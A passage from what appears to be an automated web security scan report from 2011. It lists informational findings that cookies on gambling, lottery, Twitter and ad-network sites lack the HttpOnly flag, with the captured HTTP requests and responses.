Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7569353171659657258; path=/hc/15712222
Set-Cookie: HumanClickACTIVE=1305546107605; expires=Tue, 17-May-2011 11:41:47 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:41:47 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1485

lpConnLib.Process({"ResultSet": {"lpCallId":"148742555175-454874652903","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

12.183. http://server.iad.liveperson.net/hc/15712222/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/15712222/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101514677756-1305546140:0; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
HumanClickKEY=4711607244455630702; path=/hc/15712222
HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222
LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.184. http://sv.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:03:33 GMT; path=/
UniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.185. http://sv.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=9F2E93BD550A418B6C8B77D320264753&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:12 GMT; path=/
UniqueVisitorID=9F2E93BD550A418B6C8B77D320264753; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.186. http://sv.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=2F88B34160D1FB90561B679A38A912E9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:53 GMT; path=/
UniqueVisitorID=2F88B34160D1FB90561B679A38A912E9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.187. http://sv.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:10 GMT; path=/
UniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.188. http://twitter.com/PostcodeLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PostcodeLottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1305547124447352; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
guest_id=130554712445382826; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PostcodeLottery HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.189. http://twitter.com/PrimeScratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PrimeScratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1305547124198035; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
guest_id=130554712420572627; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PrimeScratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.190. http://twitter.com/crazyscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crazyscratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1305547124050568; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
guest_id=130554712405667445; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /crazyscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.191. http://twitter.com/ukscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ukscratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1305547123976604; path=/; expires=Mon, 23-May-11 11:58:43 GMT; domain=.twitter.com
guest_id=130554712398340369; path=/; expires=Wed, 15 Jun 2011 11:58:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ukscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.192. http://va.px.invitemedia.com/goog_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/goog_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.193. http://winter.metacafe.com/Openx/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://winter.metacafe.com
Path:	/Openx/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=c28c03f15174f432a7be750cb01c8ecd; expires=Tue, 15-May-2012 12:49:29 GMT; path=/; domain=.metacafe.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.194. http://www.bet365.com/extra/en/betting/in-play previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/betting/in-play

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lng=en-GB; expires=Tue, 15-May-2012 12:31:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.195. http://www.bet365.com/extra/en/betting/live-streaming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/betting/live-streaming

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lng=en-GB; expires=Tue, 15-May-2012 12:31:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.196. http://www.bet365.com/extra/en/mobile/introduction/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/mobile/introduction/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.197. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/horse-racing/best-odds-guaranteed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.198. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/soccer/bore-draw-money-back

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lng=en-GB; expires=Tue, 15-May-2012 12:31:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.199. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/soccer/soccer-accumulator-bonus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.200. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/core/StartPlaying/Api/StartPlayingInit.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Api/StartPlayingInit.ashx HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.201. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.202. https://www.betsson.com/start/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:52 GMT
Connection: close
Content-Length: 42417
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

12.203. https://www.betsson.com/start/is/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/is/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

12.204. https://www.betsson.com/web/en/sportsbook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/web/en/sportsbook/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.205. http://www.bigmoneyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:41:39 GMT; path=/
UniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.206. http://www.bigmoneyscratch.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.207. http://www.bigmoneyscratch.com/Affiliates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Affiliates.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.208. http://www.bigmoneyscratch.com/ContactUsChat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.209. http://www.bigmoneyscratch.com/ContactUsFax.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.210. http://www.bigmoneyscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.211. http://www.bigmoneyscratch.com/ContactUsTel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.212. http://www.bigmoneyscratch.com/FAQ.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FAQ.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.213. http://www.bigmoneyscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.214. http://www.bigmoneyscratch.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.215. http://www.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
